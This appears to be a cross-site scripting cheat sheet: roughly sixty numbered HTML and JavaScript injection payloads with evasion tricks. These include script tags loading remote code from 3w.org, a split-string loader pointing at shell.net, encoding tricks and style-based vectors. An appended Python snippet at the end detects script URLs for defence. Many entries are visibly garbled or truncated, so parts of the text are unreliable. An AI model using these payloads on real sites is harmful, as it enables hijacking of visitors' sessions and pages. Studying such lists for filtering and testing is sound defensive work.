(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative pop-up triggers
<q/oncut=alert()>1
<s/onclick=alert()>
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>

(2) IMG tag XSS using JavaScript commands
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=\'#\'" /span>

(11) Embedded tab splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab splitting up the JavaScript
<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Multi-line injected JavaScript, an extreme XSS example
<IMG SRC=\'#\'" /span>

(16) Working around character limits (all parts must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters are basically useless domestically, because there is nowhere they can be exploited
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC=\'#\'" /span>

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC=\'#\'" /span>

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc
<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND
<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">

(49) STYLE attribute with a split-up expression
<IMG STYLE="xss:expression_r(alert('XSS'))">

(50) Anonymous tag with STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf" ></EMBED>
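As an added defender-side example (not part of this cheat sheet), the Python below models the normalisation a browser applies to a URL attribute before it picks the scheme, so that the variants in items (3) to (19) (mixed case, character references with and without semicolons, embedded tabs, newlines, carriage returns, null bytes, leading spaces and control characters) and the URL-carrying attributes of items (31) to (45) all collapse to the same `javascript:` prefix; a naive `"javascript:" in value` check catches none of them. The HTML fragments fed to `find_script_urls` are constructed for the test; the attribute list and the discarded-character set are assumptions, deliberately over-broad for detection.

```python
import html
import re
from html.parser import HTMLParser

# Characters discarded before the scheme is read, over-approximated on purpose
# for detection: NUL, C0 controls and space, NBSP, the U+2000-U+200B spaces,
# the ideographic space and the BOM (the code point ranges item 47 lists).
_DISCARDED = re.compile(r"[\x00-\x20\xa0\u2000-\u200b\u3000\ufeff]")

# Schemes that execute code instead of fetching a resource (the sheet uses both).
SCRIPT_SCHEMES = ("javascript:", "vbscript:")

# Attributes the sheet abuses as URL carriers (lower-cased, as HTMLParser reports them).
URL_ATTRS = {"src", "href", "background", "dynsrc", "lowsrc", "action"}


def normalize_url(value: str) -> str:
    """Canonicalise an attribute value the way a browser does before it picks
    the scheme: decode character references (with or without the trailing
    semicolon), drop discarded characters, then fold case."""
    decoded = html.unescape(value)
    return _DISCARDED.sub("", decoded).lower()


def is_script_url(value: str) -> bool:
    """True if the value would resolve to a script-executing scheme."""
    return normalize_url(value).startswith(SCRIPT_SCHEMES)


class ScriptUrlFinder(HTMLParser):
    """Collects (tag, attribute, value) for every URL attribute whose value
    runs script after browser-style normalisation."""

    def __init__(self) -> None:
        super().__init__()
        self.findings: list[tuple[str, str, str]] = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lower-cases names and decodes references in values.
        for name, value in attrs:
            if value and name in URL_ATTRS and is_script_url(value):
                self.findings.append((tag, name, value))


def find_script_urls(fragment: str) -> list[tuple[str, str, str]]:
    """Scan an HTML fragment and return the script-URL attributes it carries."""
    parser = ScriptUrlFinder()
    parser.feed(fragment)
    parser.close()
    return parser.findings
```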